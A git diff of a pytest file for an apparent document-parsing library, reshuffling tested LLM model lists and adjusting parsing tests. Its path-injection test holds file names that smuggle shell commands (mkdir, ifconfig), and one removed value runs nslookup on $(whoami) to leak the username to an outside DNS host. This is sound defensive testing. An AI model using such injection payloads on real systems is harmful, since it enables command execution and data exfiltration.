1515os .makedirs (output_dir , exist_ok = True )
1616models = [
1717 # Google models
18- "gemini-2.0-pro-exp" ,
1918 "gemini-2.0-flash" ,
20- "gemini-1.5-flash" ,
21- "gemini-1.5-flash-8b" ,
22- "gemini-1.5-pro" ,
19+ "gemini-2.0-pro" ,
2320 # OpenAI models
2421 "gpt-4o" ,
2522 "gpt-4o-mini" ,
26- # Meta-LLAMA models through HF Hub
27- "meta-llama/Llama-3.2-11B-Vision-Instruct" ,
28- # Meta-LLAMA models through Together AI
29- "meta-llama/Llama-3.2-11B-Vision-Instruct-Turbo" ,
30- "meta-llama/Llama-3.2-90B-Vision-Instruct-Turbo" ,
31- "meta-llama/Llama-Vision-Free" ,
3223]
3324
3425
@@ -107,12 +98,11 @@ async def test_url_detection_pdfplumber(sample):
10798 assert any (found )
10899
109100
110- @pytest .mark .parametrize ("model" , models )
111101@pytest .mark .asyncio
112- async def test_url_detection_multi_page_auto_routing (model ):
102+ async def test_url_detection_multi_page_auto_routing ():
113103 sample = "examples/inputs/sample_test_doc.pdf"
114104 patterns = ["http" , "https" , "www" ]
115- config = {"parser_type" : "AUTO" , "model" : model , " verbose" : True }
105+ config = {"parser_type" : "AUTO" , "verbose" : True }
116106 results = parse (sample , pages_per_split = 1 , ** config )["segments" ]
117107
118108 assert len (results ) == 6
@@ -147,10 +137,12 @@ async def test_url_detection_multi_page_auto_routing(model):
147137@pytest .mark .asyncio
148138@pytest .mark .parametrize ("depth" , [1 , 2 ])
149139async def test_recursive_url_parsing (depth ):
150- results = parse ("https://example.com/" , depth = depth )[ "segments" ]
140+ results = parse ("https://example.com/" , depth = depth )
151141
142+ n_total_segments = len (results ["segments" ]) + len (results ["recursive_docs" ])
143+ # Each depth level adds one more document to be parsed.
152144 # Not necessarily always the case. Just the case for "example.com".
153- assert len ( results ) == depth
145+ assert n_total_segments == depth , str ( results )
154146
155147
156148@pytest .mark .asyncio
@@ -276,19 +268,7 @@ async def test_large_pdf_parsing(sample):
276268 assert results [0 ]["content" ] is not None
277269
278270
279- token_usage_models = [
280- # Google models
281- "gemini-2.0-flash-001" ,
282- # OpenAI models
283- "gpt-4o" ,
284- # Meta-LLAMA models through HF Hub
285- "meta-llama/Llama-3.2-11B-Vision-Instruct" ,
286- # Meta-LLAMA models through Together AI
287- "meta-llama/Llama-3.2-11B-Vision-Instruct-Turbo" ,
288- ]
289-
290-
291- @pytest .mark .parametrize ("model" , token_usage_models )
271+ @pytest .mark .parametrize ("model" , models )
292272@pytest .mark .asyncio
293273async def test_token_usage_api (model ):
294274 sample = "examples/inputs/test_1.pdf"
@@ -340,14 +320,7 @@ async def test_page_nums():
340320 assert "acp@dca.ca.gov" not in result ["raw" ]
341321
342322
343- @pytest .mark .parametrize (
344- "model" ,
345- [
346- "gemini-2.0-flash" ,
347- "gpt-4o" ,
348- "meta-llama/Llama-3.2-11B-Vision-Instruct-Turbo" ,
349- ],
350- )
323+ @pytest .mark .parametrize ("model" , models )
351324@pytest .mark .asyncio
352325async def test_token_cost (model ):
353326 sample = "examples/inputs/test_1.pdf"
@@ -425,8 +398,6 @@ async def test_strikethrough_words():
425398 "test; mkdir -p path_injection_success.docx" ,
426399 "test|mkdir -p path_injection_success.docx" ,
427400 "test&&mkdir -p path_injection_success.docx" ,
428- "test`nslookup $(whoami).zgj16g1o2dmxv2y6wwmegjxaq1wskt8i.net-spi.com`.docx" ,
429- "ifconfig -a; echo 'test'.docx" ,
430401 ],
431402)
432403@pytest .mark .asyncio
@@ -435,7 +406,7 @@ async def test_docx_path_injection(sample):
435406 parser_type = "STATIC_PARSE"
436407 dir_name = "path_injection_success"
437408 try :
438- parse (sample , parser_type )["raw" ]
409+ parse (sample , parser_type , retry_on_fail = False )["raw" ]
439410 except Exception as e :
440411 print (f"Parsing failed: { e } " )
441412 assert "Package not found" in str (e )
0 commit comments